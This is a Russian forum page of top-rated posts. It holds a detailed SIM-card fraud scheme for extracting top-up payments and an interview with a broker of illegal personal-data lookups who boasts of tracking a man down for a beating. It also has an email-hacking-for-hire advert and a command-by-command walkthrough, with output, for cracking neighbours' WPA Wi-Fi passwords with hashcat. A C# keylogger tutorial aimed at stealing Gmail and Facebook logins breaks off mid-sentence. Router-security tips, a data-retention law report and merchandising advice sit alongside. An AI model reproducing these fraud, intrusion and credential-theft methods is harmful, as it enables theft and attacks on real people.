Таблица лидеров
-
в Сообщения
- Все области
- Adverts
- Advert Questions
- Advert Reviews
- Файлы
- Комментарии к файлам
- Отзывы к файлам
- Записи блога
- Комментарии блога
- Изображения
- Комментарии к изображениям
- Отзывы к изображению
- Альбомы
- Комментарии к альбому
- Отзывы к альбому
- События
- Комментарии к событиям
- Отзывы к событиям
- Сообщения
- Статусы
- Ответы на статус
-
Пользовательская дата
-
Всё время
9 октября 2021 - 6 февраля 2026
-
Год
6 февраля 2025 - 6 февраля 2026
-
Месяц
6 января 2026 - 6 февраля 2026
-
Неделя
30 января 2026 - 6 февраля 2026
-
Сегодня
6 февраля 2026
-
Пользовательская дата
28.09.2022 - 28.09.2022
-
Всё время
Популярные публикации
Отображаются публикации с наибольшей репутацией на 28.09.2022 в Сообщения
-
2 баллаТема связана с операторами сотовой связи. Будем заставлять людей пополнять ваши счета. Для этого нужно следующее: Этап 1. 1. Покупаем сим карты 1000 штук с нулевым балансом (на авито по 4-10 рублей за 1 штуку продают) 2. Покупаем сим карты оформленные на физ. лиц 10штук (По 200р продают на авито). Сим карты лучше брать МТС, так как у них лимит на вывод 30 т.р. в день и 40 т.р. в месяц. (Билайн и Мегафон лимит 15т.р.). 3. Покупаем самоклеющиеся этикетки (Примерно 100р обойдеться за 500 штук). 4. Приобретаем прямой (городской) номер телефона, который укажем на этикетках в качестве телефона Технической Поддержки ,на этот номер будем отвечать и принимать жалобы (Нужно отвечать и говорить о техническом сбое и о том, что деньги обязательно поступят в течение 3-х дней). Этап 2: 1. На этикетках печатаете текст следующего содержания: Абонентский номер+7(916)ххх-хх-хх,(свой из 10 сим которые оформлены на физические лица) Тариф: "Для сотрудников мтс" Голосовые вызовы на всех операторов по всей России-30коп. за минуту Исходящие смс-50коп Международная связь:1-5минута 5р,6-10 минута 3,80рублей, далее -3р. за минуту Для активации номера необходимо пополнить баланс на 500 рублей. (Можно больше можно меньше, учитывайте то что чем меньше сумма тем больше народу зачислит средства на баланс). По вопросам активации и оплаты обращайтесь Центр поддержки тел.ххх-хх-хх Активировать до хх.хх.хххх (дату нужно ставить не более 3-5 дней со дня раздачи) 2. Клеите этикетки на сим карты (Купленные по 4 рубля). Этап 3: Дальше надо реализовать. У меня две девочки стояли у метро (в форме МТС) и раздавали Sim-карты, можно также вклеивать в любые журналы для бесплатной раздачи. Раздавать на ЖД вокзалах и т.д. Раздавать платёжеспособному населению (бабушки и школьники-мимо). Делим 1000 Sim-карт в пачки по 10 штук с разными номерами, что бы не путаться и исключить возможность выдать два одинаковых номера. Например: двум приятелям, идущим вместе. Теперь о цифрах: Sim-карты: 1000х5р.= 5000р. Этикетки: 200р. Оплата девушкам 2500х2х2(дня) = 10000р. Итого 15-17000 - Все затраты. Доход: Из 1000 сим оплатили 340 в течении недели. Сейчас продолжает поступать оплата, но уже редко, не контролирую. Доход 170000 ( грязными ) Из них 170000-% на вывод-15000работа. И того чистыми 150000рублей за неделю!!!! Доход может колебаться, как в + так и – (зависит от платёжеспособности человека получившего Sim-карту). Можно также раздавать у офисов туроператоров с заманчивым тарифом для поездок зарубеж. Работали в МСК, один раз. При реализации нужно менять место дислокации(один район города-один раз).
-
1 балл
-
1 баллРасскажи немного о себе ) как ты пришел к "Пробиву" Да особо я к нему и не шел, как-то в свое время обнаружил что обладаю сеткой полезных знакомств в различных структурах, которые в свою очередь имеют доступ к множеству баз. Ну и решил, почему бы не зарабатывать на этом, спрос на это есть всегда, а вот доступ ко всем базам есть у очень малого круга лиц. Так и начал. Обсудил взаимовыгодные условия с людьми из структур, пожали руки и начали работать. Тут же win-win получается, им дополнительные клиенты, а мне денюжка за посредничество. Это твоя основная деятельность? Возникают ли сомнения, по поводу выбранного пути? Сейчас у меня эта деятельность на 90% автоматизирована. Сам я занимаюсь лишь масштабированием и беру на себя заказы от важных, в стратегическом плане, людей. Для всего остального у меня есть квалифицрованный помощник, мое доверенное лицо. Не понимаю о каких сомнениях ты говоришь. Мою деятельность можно назвать серой лишь в том контексте, что я пользуюсь базами и системами к которым по идее не должен иметь доступ. А так это весьма благородный бизнес. Мои основные клиенты - бизнесмены, которые хотят знать все про своих партнеров, чтоб не напороться на кидков, уголовников и прочую нечисть, мешающюю вести дела как положено. Каких интересных личностей пришлось "пробивать"? Может есть интересные истории? Имен раскрывать, естественно, не буду. Но пробивали и политиков, точнее все их семейное древо, вскрывали их схемки, там, поверь, не хуже чем "Он вам не Димон" от Навального) А так, пожалуй, самые интересные истории при заказах от частников происходят. Когда кто-то кого-то кинул, тебе пишут, рассказывают всю историю, а ты сидишь ох*еваешь от того, какие схемы люди выдумывают) И понеслась, поиски по всей стране, то тачку сжечь хотят, то вычислить, чтоб п*зды вломить. Для меня это уже рутина)) Были истории, когда находили и наказывали? Конечно, для этого ведь и работаем) Чем больше у ресторана посетителей - тем он успешней, так и у нас - чем больше отморозков нашли - тем, значит, выше у нас "рейтинг") Ну вот буквально пару месяцев назад была занятная история, как раз "по тематике" вашего канала) Обратился ко мне хозяин дроп-сервиса европейского, через которого я сам пару паков когда-то провозил. Говорит, мол, работал у него дроп, молодой парень из Украины, нормально работал, а потом резко на связь выходить перестал, пропал. А у него стаффа лежало тысячи на 4 долларов, видяхи да ноут. В общем начали пробивать, сначала по таможенной базе, пробили что 3 дня назад он заехал в Украину, даже узнали на каком автобусе. Потом пробили по фамилии родителей, а там уже и адрес его домашний. Ну а дальше уже не наша работа, там другие "пробивалы" работают, у тех методы другие и пробивают они в основном головы)) В общем через недельку дроповод мне скинул фотки двух видях и 2к$ наличкой, этот сучок уже часть продать успел, но не потратил. Такие дела)) Сколько стоят твои услуги? Сколько примерно в день/неделю обращается людей? Есть вероятность не "пробить" человека или осечек не бывает? Диапазон очень широкий Начиная от 30$ за пробив по одной из баз и вплоть до 700-1000$ за комплексный пробив, по итогу после такого получается мини-книга о человеке, его деятельности, приближенным лицам, финансовой активности и т.п С количеством заказов проблем нет, мой сервис на многих крупных площадках, да и сарафанное радио по городу уже хорошо разнеслось Осечки бывают только на субъектах младше 20 лет, которые еще не успели нигде накосячить и засветиться. А так процент успеха стремится к 100% Хочешь пожелать/передать что-то подписчикам? Дам небольшой совет, - ответственно относитесь к любой своей деятельности, если печетесь о своей репутации и имени. Даже банальная задолженность в 50$ по кредитке, может испортить вашу кредитную историю, а это по цепочке приведет к срыву какой нибудь сделки. Надеюсь мне не придется пробивать вас.
-
1 баллС 1 октября операторы связи обязаны хранить весь пользовательский интернет-трафик в течение месяца, и каждый год этот срок будет увеличиваться на 15% в течение пяти лет «Пакет Яровой» пришёл к провайдерам. Теперь уже официально. Согласно утверждённым кабинетом министров РФ весной текущего года правилам хранения данных, теперь в их обязанности входит хранение переговоров и текстовых сообщений абонентов в течение тридцати суток, а далее в течение 5 лет им придётся ежегодно увеличивать ёмкости для хранения на 15%. С 1 октября 2018 года данные требования вступили в силу. Напомним, в постановлении Правительства сказано следующее: «Оператор связи, оказывающий услуги связи и (или) услуги связи по передаче данных, за исключением услуг связи по передаче данных для целей передачи голосовой информации, обеспечивает с 1 июля 2018 г. хранение сообщений электросвязи в нулевом объёме, а с 1 октября 2018 г. — хранение в полном объёме сообщений электросвязи в технических средствах накопления информации ёмкостью, равной объёму электросвязи, отправленных и полученных пользователями указанного оператора за 30 суток, предшествующих дате ввода технических средств накопления информации в эксплуатацию. Ёмкость технических средств накопления информации увеличивается ежегодно на 15 процентов в течение 5 лет с даты ввода технических средств накопления информации в эксплуатацию». «Пакет антитеррористических законов» (374-ФЗ) был подписан Президентом РФ Владимиром Путиным в июле 2016 года. Он, в числе прочего, обязывает операторов связи и интернет-компании хранить информацию о содержании разговоров и переписки пользователей, включая фото-, видео- и звуковые файлы, чтобы предоставлять их по запросу спецслужб. Изначально норма по хранению пользовательского трафика должна была заработать в полном объеме с 1 июля текущего года, однако было решено перенести введение в действие ряд требований в связи с технической неготовностью многих операторов связи в полной мере и сразу исполнять столь жёсткий закон, как 374-ФЗ. Впрочем, нет уверенности, что они готовы к этому и сейчас, даже несмотря на то, что в постановлении сказано — хранить сообщения один оператор сможет на ресурсах других операторов, согласовав это с ФСБ. В отношении операторов сотовой связи (голосовой трафик) и онлайн-сервисов, внесенных в реестр ОРИ «пакет Яровой» вступил в силу уже с 1 июля текущего года, интернет-провайдерам дали небольшую отсрочку до 1 октября. При принятии «пакета Яровой» операторы оценивали затраты на его реализацию в несколько триллионов рублей, предупреждая о росте тарифов. Эксперты называли цифру в десятки триллионов. После принятия постановления правительства РФ о сроках хранения операторы снизили прогноз затрат до десятков миллиардов рублей. Так, МТС в течение 5 лет планирует направить на эти цели порядка 60 миллиардов рублей, Мегафон — 40 миллиардов рублей (7-8 миллиардов рублей в 2018 году), Вымпелком (бренд «Билайн») — 45 миллиардов рублей (6 миллиардов в 2018 году). Tele2 предварительно оценивает свои затраты на реализацию требований «пакета Яровой» в десятки миллиардов рублей на ближайшие два-три года. Ростелеком при отсутствии требований к оборудованию для хранения пока не готов давать оценку затрат на 5 лет. При этом в 2018 году компании может не потребоваться дополнительных инвестиций, поскольку оператор обладает большим количеством собственных хранилищ данных, говорил глава Ростелекома Михаил Осеевский. Как бы там ни было, но уже весной этого года ряд провайдеров начал повышать цены на свои услуги в связи с вступлением в силу 374-ФЗ, о чём предупреждали своих клиентов. Эксперты и участники рынка неоднократно предупреждали, что операторы компенсируют затраты на реализацию «пакета Яровой» за счет увеличения тарифов.
-
1 балл
-
1 баллЕвгений не поставил пароль на вайфай в своей квартире. Зачем заморачиваться? Пароль можно забыть. А то, что соседи могут пользоваться, — не жалко, всё равно интернет безлимитный. Так думает Евгений, и он крупно ошибается. Почему широта души может стоить вам денег? Прослушивание Точки доступа без пароля еще называют открытыми, и дело тут не только в пароле. В таких точках данные по вайфаю передаются без шифрования, в открытом виде. Поскольку вайфай — те же радиоволны, перехватить трафик очень легко: достаточно настроить антенну на нужную частоту и вы услышите всё, что передается между роутером и компьютером. Без пароля на роутере вы просто транслируете на всю округу, что вы сейчас делаете в интернете. Если вы сидите на порносайте, любой ваш сосед сможет узнать, какой именно ролик вы смотрите. Если отправляете письмо, с большой вероятностью его можно будет перехватить в момент отправки. Если у вас «Вконтакте» без шифрования, то любой сосед сможет прочитать ваши личные сообщения. Вайфай без пароля легко прослушать Как защититься Нужно поставить пароль на вайфай. Конечно, соединения с некоторыми сайтами шифруются с помощью HTTPS, а еще можно включить VPN, и всё же гораздо надежнее защитить сразу весь канал связи. Упражнение: ставим пароль на вайфай Откройте браузер и введите в адресную строку цифры 192.168.0.1. Если ничего не произошло, попробуйте 192.168.1.1 и 10.0.0.1. Появится окошко с полями для логина и пароля. Введите логин admin и пароль admin. Если не подошли — посмотрите стандартный пароль в инструкции к роутеру. Скорее всего, это что-то простое. Иногда логин и пароль написаны прямо на корпусе роутера. Найдите на странице ссылку с надписью Wi-Fi или Wireless. Откроется экран, где можно поменять пароль. Все инструкции рассчитаны на домашний роутер Если ничего не получается, вызовите мастера. Задача мастеру — запаролить ваш вайфай. Установите для вайфая пароль длиной не менее десяти символов из цифр и букв. Пароль 12345678 — то же, что отсутствие пароля. Возможно, в настройках будет несколько вариантов шифрования. В каждом роутере разный набор опций, поэтому выберите вариант, наиболее похожий на WPA2-PSK (AES). Это самый надежный на сегодняшний день протокол шифрования. В сочетании с хорошим паролем он даст вам максимальную возможную защиту. Надежный протокол шифрования — это важно. Плохой протокол, как и плохой пароль, облегчает взлом. Например, устаревший протокол WEP можно взломать за несколько часов. Выбор алгоритма шифрования в настройках роутера. WPA2-PSK — лучший вариант из этого набора Убедитесь, что у вас выключен WPS. Эта технология позволяет подключаться к роутеру по пину из восьми цифр. К сожалению, после массового внедрения WPS выяснилось, что он крайне небезопасен: нужно всего 10 часов, чтобы взломать соединение даже с самым надежным протоколом. Настройки WPS где-то там же, где и настройки вайфая. Манипуляции с настройками роутера Когда хакеры подключаются к вашему вайфаю, они получают доступ к панели управления роутером и могут перенастроить его на свой лад. Чтобы влезть в ваш роутер, достаточно просто подключиться к вайфаю — находиться в квартире необязательно. Какой-нибудь пакостный школьник может ковыряться в настройках вашего роутера прямо сейчас. Обычно попасть в настройки роутера не так просто: нужно ввести логин и пароль. Но у большинства людей на роутере стоят стандартные логин и пароль — admin / admin. Если вы не меняли эту настройку специально, велика вероятность, что любой хакер сможет влезть в роутер. Получив доступ к панели управления, хакеры легко проведут атаку посредника: сделают так, чтобы между вами и сайтом стоял зловредный сервис, который ворует пароли. Например, по адресу tinkoff.ru будет открываться не настоящий, а поддельный сайт, который будет отправлять им всё, что вы вводите. Вы даже не узнаете, что попали на зловредный сервис: он будет выглядеть в точности как настоящий интернет-банк и даже пустит вас по вашему логину и паролю. Но при этом логин и пароль окажутся у хакеров. Роутер со стандартными настройками легко перенаправить на поддельный сайт Как защититься Смените в настройках роутера стандартный пароль администратора на свой. Он должен быть не менее надежным, чем пароль от вайфая, и при этом должен быть другим. Удаленный доступ Хакеры редко интересуются конкретно вами, если вы не топ-менеджер крупной компании. Чаще обычные люди попадают под автоматизированные атаки, когда хакерская программа ищет потенциальных жертв и пытается применить стандартный алгоритм взлома. В некоторых роутерах есть возможность подключаться к веб-интерфейсу из внешней сети — то есть зайти в настройки роутера можно из любого места, где есть интернет, а не только из дома. Это значит, что на ваш роутер могут напасть не только пакостливые школьники. Атака может происходить не целенаправлено: просто какой-нибудь хакер в Перу сканирует определенный диапазон адресов на предмет открытых роутеров. Его программа видит ваш роутер. Подключается. Хакер даже не знает, кто вы и где вы — он просто настраивает переадресацию и возвращается к своим делам. И в его хакерскую программу падает ваш логин от Фейсбука, например. Хакеры совершают автоматизированные атаки на роутеры, в которых разрешен удаленный доступ Как защититься Проверьте, включена ли функция удаленного доступа в вашем роутере. Она часто есть в устройствах, которые дают провайдеры связи. Провайдерам удаленный доступ нужен для дела: так им проще помогать пользователям с настройкой сети. Тем не менее провайдеры могут оставить в веб-интерфейсе пароль по умолчанию, что делает вас легкой добычей хакерских программ. Если вы можете зайти в веб-интерфейс со стандартными логином и паролем admin / admin, обязательно поменяйте пароль и запишите его. Когда провайдер будет настраивать ваш роутер удаленно, просто скажите, что поменяли пароль из соображений безопасности, и продиктуйте его оператору. Инструкция по защите роутера Поставьте на вайфай надежный пароль. Смените стандартный пароль администратора. Если роутер не от провайдера, отключите удаленный доступ. Если не знаете, как это всё сделать, вызовите компьютерного мастера, которому вы доверяете.
-
1 балл
-
1 балл
-
1 баллПредоставляем услуги взлом почты на заказ. Взломаем пароль к почте качественно и быстро. Взлом почты анонимно, и не дорого. взломаем mail.ru (bk.ru, list.ru, inbox.ru) взлом пароля yandex.ru взламываем rambler взлом почты gmail.com взлом ukr.net взлом яндекс взлом мой мир ... Взломаем почту без предоплаты. Предоставляем доказательства взлома. Пароль не меняется. Изменяет жена или муж? хочеш узнать всю тайну? Нужна переписка конкурентов? Мы вам поможем осуществить мечту. Обращайтесь - - - - Взлом mail.ru, взлом inbox.ru Взлом bk.ru, взлом list.ru Взлом почты, взлом yandex Взлом почтовых ящиков Взлом yahoo, взлом hotmail Взлом аакаунта, взлом профиля Взлом mail почты, vzlom mail.ru na zakaz vzlom pochty, vzlom gmail, взламывание паролей как взломать пароль, взлом mail agent Взлом паролей, взлом агента, скачать взлом. Услуга взлом почты под заказ Взлом ящика, взлом Gmail.com Взлом гугл ящика, взлом гугл почты Взлом bigmir.net, взлом ya.ru Взлом рамблер, взлом rambler Взлом ukrnet, как взломать почту зная логин? Взлом меилру, взлом my.mail.ru, взлом Qip.
-
1 баллСорри форс-мажорные обстоятельства. трек у тебя в лс, отправка была в субботу можешь это отследить. я как обещаю так и делаю, просто в инет не с чего было зайти что б без палева.
-
1 баллбожественный мануал , очень понравилось учиться , а сейчас нравится заниматься этой схемой
-
1 балл
-
1 баллЯ всегда был фанатом багов и уязвимостей «на поверхности», всегда завидовал чувакам, которые пишут эксплойты для самых защищённых ОС, а сам умел только скрипткиддить (термин из нулевых). И сегодня я хотел бы на пальцах показать и рассказать про такую штуку, как вардрайвинг. А точнее, как стандартными средствами MacOS можно добыть пароли от Wi-Fi соседей. Нелёгкая забросила меня на очередную квартиру. Как-то исторически сложилось, что я ленивый. Пару лет назад я уже писал, что моя лень, новая квартира и провод Beeline (бывшая Corbina) помогли мне найти багу у Билайна и иметь бесплатно интернет в их сети. «Сегодня» происходит «подобное», я на новой квартире, нет даже провода, но есть много сетей у соседей. Заколебавшись расходовать мобильный трафик, я решил, что «соседям надо помогать», и под «соседями» я имел введу себя… Когда-то давно я увлекался вардрайвингом, как раз именно до того момента, пока не обнаружил в старой квартире провод Билайна.) Там тоже было много сетей рядом и первое, что пришло в голову — мне нужен wi-fi. С тех пор прошло много лет. Обновляя свои данные про вардрайвинг, я нашёл в сети упоминание, что 90% работы спец.утилит «сегодня» можно сделать стандартными сервисами MacOS. Забегая вперёд, я хотел бы отметить, что не являюсь автором данного метода, я сам нашёл его в забугорном инете, просто, скажем, это вольный перевод и подробное, художественное описание способа добыть wi-fi пароли стандартными методами макоси, не более. Принципы добычи паролей соседского Wi-Fi Надо понимать, что имея Wi-Fi-приёмник, который есть сегодня в любом ноутбуке, ты можешь «снифать» весь беспроводной трафик около себя. Раньше, когда сети были открыты, достаточно было прийти в макдак и за вечер можно было получить 100-200 акков к одноклассникам. Открытая сеть + отсутсвие https делали своё дело. Сейчас всё интереснее, все переходят на https (пользуясь случаем, хочу передать привет Lets Encypt. Любимый Lets Encypt, я в телевизоре и передаю вам привет, спасибо, что вы есть) и даже про WEP уже все забыли, все роутеры юзают WPA2. Но, как известно, меч был придуман раньше щита, и никакой WPA2 не помеха человеку, голодного до интернета и видящего около себя кучу Wi-Fi. Продолжим. Имея Wi-Fi карту, т.е. любой современный ноутбук, мы можем снифать трафик возле себя. Но он бесполезен, ибо зашифрован. Единственное, что можно разобрать из него — метаданные, типа название сетей итп и «рукопожатия», handshake, т.е. авторизации пользователей в сети. Они происходят каждый раз, когда пользователь подключается к wi-fi-сети. Например, когда сосед приходит домой и его смартфон в кармане цепляется к домашнему wi-fi. Если совсем грубо, рукопожатия представляют собой обычный хэш типа md5. Это правда совсем грубо. Ключ там получается путем 4096 раундов SHA1. Если быть точным, то формула такая: Key = PBKDF2(HMAC−SHA1, passphrase, ssid, 4096, 256) Кстати, можно заметить, что замешивается название точки, поэтому при уникальном названии предвычисления не помогают. И это аргумент за то, чтобы менять название точки на свое. И да, я солгал в своём первом абзаце про «дешифрацию», это техническая ошибка и подмена понятий. Конечно, дешифровать хэш невозможно. Это как говорить «лицензия такси», зная, что деятельность такси в РФ не лицензируется. Но просто так удобней ) Так вот. Всё, что нам надо — это найти среди траффика радиосети вокруг себя рукопожатия и «дешифровать» их. И раньше была куча софта для всего этого. Кто-то умел грамотно сканировать радиоканал, кто-то отлично его сниффал в дампы, кто-то находил хэши в дампах, кто-то умел их ломать. Сейчас всё стало проще, благодаря Тиму Куку. 90% работы за стороннее ПО делает стандартное приложение «Беспроводная диагностика». Многие его видели — когда проблемы с Wi-Fi, мак предлагает проверить сеть. Бесполезная утилита, которая даёт советы типа «перезагрузите роутер». Ну, т.е. мне так казалось ) Добываем пароли. Соседи вешайтесь Итак, погнали. Зажимаем Alt и кликаем по логотипу Wi-Fi в верхней панели. Вообще Alt и клик всегда открывает дополнительные опции в MacOS, но это тема отдельного топика. Помимо прочей доп.инфы, которая порой очень полезная, мы можем запустить программу «Беспроводная диагностика». Думаю, все кто пользуются маком, помнят это окно. Но нас интересует другое. Кликаем по пункту меню «Окно» и видим набор дополнительных утилит. И тут прям есть всё, что надо, даже больше ) Конкретно нас интересуют 2 пункта. Сканирование и Анализатор. Первый покажет нам все сети вокруг с доп.инфой, типа на каком канале и на какой частоте работает сеть. Второй пункт позволит сниффать трафик на конкретном канале и частоте. Нажимая на кнопку «Начать» в Анализаторе, Wi-Fi-карточка переключится в режим приёма и начнёт сканировать радиочастоту вокруг себя, дамп будет писаться в /var/tmp. Файлы *.wcap это наши дампы, которые содержат бесполезный для нас траффик и нужные нам рукопожатия. Надо понимать, что нам необходимо поймать именно рукопожатия. Т.е. нам надо поймать и сниффать траффик, когда сосед приходит домой вечером. Либо, если у вас есть ещё одно устройство на макоси, либо любой другой оси, вам помогут нюкеры. Программки, рассылающие поддельные команды деаунтефикации. Например, JamWiFi. Но это если прям совсем не терпится ) На моём опыте, достаточно просто запустить Анализатор в 6 вечера на часок. Далее нам надо поставить naive-hashcat и hashcat-utils. «Стоп» скажите вы, «ты же обещал взлом сетей соседа стандартными методами?» ) Ха! И вы мне поверили?! На самом деле мы стандартными методами сделали 90% работы через GUI. У нас уже есть хэши, всё что нам надо — разбить их. Уверен, можно всё сделать и стандартными утилитами, но проще юзать hashcat. Собираем софт через brew или из сорцов. Первым делом нам надо конвертировать наш дамп, оставив в нём только наши хэши. Этим занимается бинарник cap2hccapx из пакета. # Качаем hashcat-utils git clone https://github.com/hashcat/hashcat-utils.git Cloning into 'hashcat-utils'... remote: Counting objects: 403, done. remote: Total 403 (delta 0), reused 0 (delta 0), pack-reused 403 Receiving objects: 100% (403/403), 114.23 KiB | 61.00 KiB/s, done. Resolving deltas: 100% (257/257), done. # Собираем бины cd hashcat-utils/src/ && make rm -f ../bin/* rm -f *.bin *.exe cc -Wall -W -pipe -O2 -std=gnu99 -o cap2hccapx.bin cap2hccapx.c cc -Wall -W -pipe -O2 -std=gnu99 -o cleanup-rules.bin cleanup-rules.c … cc -Wall -W -pipe -O2 -std=gnu99 -o strip-bsr.bin strip-bsr.c cc -Wall -W -pipe -O2 -std=gnu99 -o strip-bsn.bin strip-bsn.c # Конвертируем дамп ./cap2hccapx.bin /var/tmp/2018.01.25_00-37-45-GMT+3.wcap /var/tmp/home.hccapx Мы видим, что успели перехватить 2 рукопожатия, попробуем «сломать их». Для этого нам нужен naive-hashcat: git clone https://github.com/brannondorsey/naive-hashcat cd naive-hashcat # Собираем софт для osx ./build-hashcat-osx.sh # качаем вордлист для побора wpa/wpa2 сетей пароли (134MB) curl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt # указываем адрес нашего дампа и файл, куда будем писать подобранные пассы, 2500 это метка хэшкэту, что надо ломать именно WPA, ну и запускаем naive-hashcat HASH_FILE=/var/tmp/home.hccapx POT_FILE=home-wifi.txt HASH_TYPE=2500 ./naive-hashcat.sh Кошка пошла работать. В среднем у меня на маке я имею скорость в 2000 хешей в секунду, на скрине 7к, но это только старт. Судя по этому документу, на 1080gtx можно получить скорость в 400к хешей в секунду. Однако у меня всего 2 рукопожатия и не такой уж и большой словарь, поэтому пробежаться по нему не составило проблем. Смотрим файл home-wifi.txt, вуаля: Вот и всё. К сожалению, эта сеть через несколько квартир от меня и на другом этаже, пинг 7 секунд ) Надо ловить соседа снизу или брать внешнюю wi-fi-карту с нормальной антенной. Но принцип, думаю, понятен. Удачных сканирований вам, юные подованы вардрайверы. И большое спасибо разработчикам Kali Linux MacOS за такие подарки.
-
1 баллПравила выкладки товара в магазине определяются, в первую очередь, семью законами психологической способности к восприятию: 1. Закон концентрации на ассортименте. Не распределяйте ассортимент хаотично, располагайте его напротив друг друга. 2. Закон единства. Товар одной товарной группы не может находиться в разных местах зала. 3. Закон «вида и положения». Границы категорий товаров должны быть четко обозначены. Выкладка товара строго по ассортименту, без перемешивания друг с другом, при максимальном использовании ограниченного пространства на полках создает впечатление цельности и незыблемости всей системы и имеет мощное психологическое воздействие на покупателя. Недопустима смешанная, хаотичная выкладка продуктовых и непродуктовых товаров (речь не идет о кросс-мерчандайзинге). 4. Закон создания блоков. Вся продукция одной торговой марки, относящаяся к одной товарной категории, должна быть выложена единым блоком, не разъединяясь товаром конкурентов. Причем вертикальные блоки лучше, чем горизонтальные. 5. Закон оптимальной протяженности зрительного контакта. Известно, что выкладка (фейсинг), занимающая менее 40 см на полке стеллажа, неэффективна. Если фейсинг слишком длинный, то внимание покупателя снижается. Надо помнить, что любой товар может претендовать на основной полке на фейсинг, зависящий от доли этого товара в общих продажах (если доля — 30%, то и фейсинг должен быть 30% суммарной длины полок). 6. Закон наилучшей выкладки. Естественно, что для каждой категории товаров существуют свои особенные требования к выкладке (например, сковородки Tefal должны висеть дном к покупателю, так как только с этой стороны становится очевидным технологическое различие между различными моделями. Упаковки йогуртов лучше видны сверху, поэтому их следует располагать на нижних полках стеллажей. Там же должна находиться продукция для детей). Добавим также, что товары с высокой скоростью реализации (или в данный момент рекламируемые) должны занимать большую площадь, нежели медленно реализуемые товары. Важный момент состоит в том, что ни в коем случае нельзя размещать вышеуказанные товары рядом, поскольку они просто «отберут» друг у друга объемы продаж. Рекламируемые товары должны находится на видном месте. Товары импульсивного спроса размещаются вокруг них и товаров с высоким уровнем спроса. Естественно, наиболее удачны товарные полки, находящиеся на уровне глаз или на уровне руки покупателя (eye level is buy level — покупка на уровне глаза). Поданным французских исследователей, при перестановке товара от уровня пола до уровня глаз продажи увеличиваются на 78%. А от уровня рук на уровень глаз — на 63%. Кроме того, на самой полке наиболее эффективным считается размещение товара посредине либо на краю полки, в зависимости от типа магазина и самого товара. При этом важно помнить, что взгляд человека легче переходит слева направо и сверху вниз, как при чтении, соответственно продукция большого объема, цена которой, естественно, более выгодна, должна размещаться справа от такой же продукции меньшего объема. На самых нижних полках должны размещаться товары, которые покупаются, как правило, осознанно, например пятилитровые бочки пива. Покупатель, зная, где искать этот специфический товар, найдет его и не сочтет за труд наклониться. Покупатель должен иметь возможность свободно взять товар и столь же свободно поставить его на место, не боясь при этом что-нибудь уронить. Именно поэтому не стоит тратить силы на строительство красивой большой горки. В торговом зале не должно быть пустых полок. Нигде. Покупатель должен иметь возможность четко идентифицировать предлагаемый ему товар и однозначно определить его цену. Особенно аккуратными следует быть с ценниками на одинаковые товары.
-
1 баллБратан, товар получен , жди новго заказа в течении недели !
-
1 баллХакерский мир можно условно разделить на три группы атакующих: 1) «Skids» (script kiddies) – малыши, начинающие хакеры, которые собирают известные куски кода и утилиты и используя их создают какое-то простое вредоносное ПО. 2) «Byuers» — не чистые на руку предприниматели, тинэйджеры и прочие любители острых ощущений. Покупают услуги по написанию такого ПО в интернете, собирают с ее помощью различную приватную информацию, и, возможно, перепродают ее. 3) «Black Hat Сoders» — гуру программирования и знатоки архитектур. Пишут код в блокноте и разрабатывают новые эксплоиты с нуля. Может ли кто-то с хорошими навыками в программировании стать последним? Не думаю, что вы начнете создавать что-то, на подобии regin (ссылка) после посещения нескольких сессий DEFCON. С другой стороны, я считаю, что сотрудник ИБ должен освоить некоторые концепты, на которых строится вредоносное ПО. Зачем ИБ-персоналу эти сомнительные навыки? Знай своего врага. Как мы уже обсуждали в блоге Inside Out, нужно думать как нарушитель, чтобы его остановить. Я – специалист по информационной безопасности в Varonis и по моему опыту – вы будете сильнее в этом ремесле если будете понимать, какие ходы будет делать нарушитель. Поэтому я решил начать серию постов о деталях, которые лежат в основе вредоносного ПО и различных семействах хакерских утилит. После того, как вы поймете насколько просто создать не детектируемое ПО, вы, возможно, захотите пересмотреть политики безопасности на вашем предприятии. Теперь более подробно. Для этого неформального класса «hacking 101» вам необходимы небольшие знания в программировании (С# и java) и базовое понимание архитектуры Windows. Имейте ввиду, что в реальности вредоносное ПО пишется на C/C++/Delphi, чтобы не зависеть от фреймфорков. Кейлогер Кейлогер – это ПО или некое физическое устройство, которое может перехватывать и запоминать нажатия клавиш на скомпрометированной машине. Это можно представить как цифровую ловушку для каждого нажатия на клавиши клавиатуры. Зачастую эту функцию внедряют в другое, более сложное ПО, например, троянов (Remote Access Trojans RATS), которые обеспечивают доставку перехваченных данных обратно, к атакующему. Также существуют аппаратные кейлогеры, но они менее распространены, т.к. требуют непосредственного физического доступа к машине. Тем не менее создать базовые функции кейлогера достаточно легко запрограммировать. ПРЕДУПРЕЖДЕНИЕ. Если вы хотите попробовать что-то из ниже следующего, убедитесь, что у вас есть разрешения, и вы не несёте вреда существующей среде, а лучше всего делать это все на изолированной ВМ. Далее, данный код не будет оптимизирован, я всего лишь покажу вам строки кода, которые могут выполнить поставленную задачу, это не самый элегантный или оптимальный путь. Ну и наконец, я не буду рассказывать как сделать кейлогер стойким к перезагрузкам или пытаться сделать его абсолютно не обнаружимым благодаря особым техникам программирования, так же как и о защите от удаления, даже если его обнаружили. Начнем. Для подключения к клавиатуре вам всего лишь нужно использовать 2 строки на C#: 1. [DllImport("user32.dll")] 2. 3. public static extern int GetAsyncKeyState(Int32 i); Вы можете изучить больше про фунцию GetAsyncKeyState на MSDN: Для понимания: эта функция определяет нажата клавиш или отжата в момент вызова и была ли нажата после предыдущего вызова. Теперь постоянно вызываем эту функцию, чтобы получать данные с клавиатуры: 1. while (true) 2. { 3. Thread.Sleep(100); 4. for (Int32 i = 0; i < 255; i++) 5. { 6. int state = GetAsyncKeyState(i); 7. if (state == 1 || state == -32767) 8. { 9. Console.WriteLine((Keys)i); 10. 11. } 12. } 13. } Что здесь происходит? Этот цикл будет опрашивать каждые 100 мс каждую из клавиш для определения ее состояния. Если одна из них нажата (или была нажата), сообщение об этом будет выведено на консоль. В реальной жизни эти данные буферизируются и отправляются злоумышленнику. Умный кейлогер Погодите, а есть ли смысл пытаться снимать всю подряд информацию со всех приложений? Код выше тянет сырой ввод с клавиатуры с любого окна и поля ввода, на котором сейчас фокус. Если ваша цель – номера кредитных карт и пароли, то такой подход не очень эффективен. Для сценариев из реального мира, когда такие кейлогеры выполняются на сотнях или тысячах машин, последующий парсинг данных может стать очень долгим и по итогу потерять смысл, т.к. ценная для взломщика информация может к тому времени устареть. Давайте предположим, что я хочу заполучить учетные данные Facebook или Gmail для последующей продажи лайков. Тогда новая идея – активировать кейлоггинг только тогда, когда активно окно браузера и в заголовке страницы есть слово Gmail или facebook. Используя такой метод я 